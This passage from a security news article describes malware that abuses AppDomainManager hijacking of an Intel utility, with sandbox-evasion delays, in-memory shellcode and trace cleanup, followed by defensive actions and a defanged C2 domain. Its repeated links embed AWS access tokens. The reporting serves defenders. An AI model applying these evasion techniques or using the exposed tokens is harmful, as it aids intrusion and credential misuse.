<figure class="aligncenter size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8_ksRD7ggj951BuPn9euRAVdIGmo36Q8jEXWgxjsYx571Sbu1-0-TtmyA338UxiaV2OluQbkbsPrmsNwnBYQ1vCXOo-Oxdg6eZCZS2dHNrMwnphDdnuGbpJX7AGFH0EVd39xjla4eSvTktmYRWe0NworITi9h3ynocrvWm9nC6aTCHccwIDqRR1GPBnY/s16000/Directory%20Listing%20-%20Victim%20Perspective%20(Source%20-%20Cyfirma).webp" alt="Directory Listing - Victim Perspective (Source - Cyfirma)" /><figcaption class="wp-element-caption">Directory Listing &#8211; Victim Perspective (Source &#8211; Cyfirma)</figcaption></figure>
</div>


<p>From there, the AppDomainManager hijack takes over via the malicious configuration file, loading a rogue .NET DLL named IAStorHelpMosquitoproof.dll before legitimate program logic runs.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9QckDw2IXEyCVXl-pNh1hEP0cJIaI85Lz_1hkqIdTHdpgo_BR9tQpIca10k8uiQYYtJ1E8XkmHNhy4C5XyInSYq6cm5wSsAD6r_lqBni2qVCfY4rjBnCDeKkJe-d8f5qle64qt8EbLjuGa0Tx7hFhtzRvbrc2PeQ60ux3nZ0kAIEQ3Dk4UWjSbTGuvEc/s16000/Weaponized%20.exe.config%20showing%20decoy%20appSettings%20and%20runtime%20CLR%20hijack%20(Source%20-%20Cyfirma).webp" alt="Weaponized .exe.config showing decoy appSettings and runtime CLR hijack (Source - Cyfirma)" /><figcaption class="wp-element-caption">Weaponized .exe.config showing decoy appSettings and runtime CLR hijack (Source &#8211; Cyfirma)</figcaption></figure>
</div>


<p>To avoid triggering automated sandbox environments, the malware uses a clever two-part delay strategy. </p>



<p>First, it runs a CPU-intensive prime number calculation that burns a full 60 seconds of processing time without making any suspicious system calls. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6l8hjv9l8YUeOJVcMJ5uFeY9ZsETMnApCJPubGz7AgQOlC7wj0UGdTVtPsROl-ZKe3RrRa9QeHeLwxXyI-DNNCLWjtQcQl6ysRrdmitTYjo-SvuKPWlgWgB_Hfvi82Jio1uCvKuWp7_oub4-6S7XIZrK6_CJyzefUz7eArWsDKqzHordwkBjuuIfNYw/s16000/The%2060-second%20sandbox%20evasion%20timing%20gate%20(Source%20-%20Cyfirma).webp" alt="The 60-second sandbox evasion timing gate (Source - Cyfirma)" /><figcaption class="wp-element-caption">The 60-second sandbox evasion timing gate (Source &#8211; Cyfirma)</figcaption></figure>
</div>


<p>Second, it cycles through 892,007 iterations of a constrained AES key derivation loop, performing trial decryptions using SHA-256 hashed integer seeds until it finds the correct key at iteration 41,410. </p>



<p>Together, these phases exhaust most sandbox analysis windows before any malicious behavior appears.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></p>



<p>Once the payload is decrypted and active, it uses a JIT trampoline technique to run shellcode entirely inside memory, bypassing the standard Windows memory allocation functions that most <a href="https://cybersecuritynews.com/best-cloud-security-tools/" id="11635" target="_blank" rel="noreferrer noopener">security tools</a> monitor. </p>



<p>The malware also performs a &#8220;DLL injection storm,&#8221; loading 16 legitimate-looking Windows libraries in random order to flood security monitoring systems with noise and hide its real activity. </p>



<p>After execution completes, it cleans up all memory traces in two phases using NtProtectVirtualMemory and NtFreeVirtualMemory, making forensic recovery extremely difficult.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></p>



<p>Security teams should take the following actions in response to this threat:-</p>



<p><strong>Strategic actions:</strong></p>



<ul class="wp-block-list">
<li>Deploy updated detection signatures across all endpoints immediately, as the framework bypasses conventional EDR and antivirus controls without them.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></li>



<li>Invest in SSL/TLS inspection for traffic bound to <a href="https://cybersecuritynews.com/cloudflare-global-outage-breaks-internet/" id="133636" target="_blank" rel="noreferrer noopener">CDN platforms</a> like CloudFront, since IP-based blocking alone will not stop domain fronting.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></li>



<li>Launch a .NET security hardening initiative focused specifically on restricting AppDomainManager usage, as this technique is being adopted by multiple threat actors.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></li>
</ul>



<p><strong>Tactical actions:</strong></p>



<ul class="wp-block-list">
<li>Block the identified C2 domains at the DNS and firewall level: dp8519iqiftub[.]cloudfront[.]net and the associated AWS ELB backend.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></li>



<li>Review DNS logs to identify any systems that have already resolved these <a href="https://cybersecuritynews.com/education-themed-malicious-domains-linked/" id="141103" target="_blank" rel="noreferrer noopener">malicious domains</a>.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></li>



<li>Conduct endpoint sweeps to detect suspicious binaries running from non-standard paths.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></li>
</ul>



<p><strong>Operational actions:</strong></p>



<ul class="wp-block-list">
<li>Enforce AppDomainManager restrictions through application whitelisting and policy controls to prevent execution flow hijacking.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZL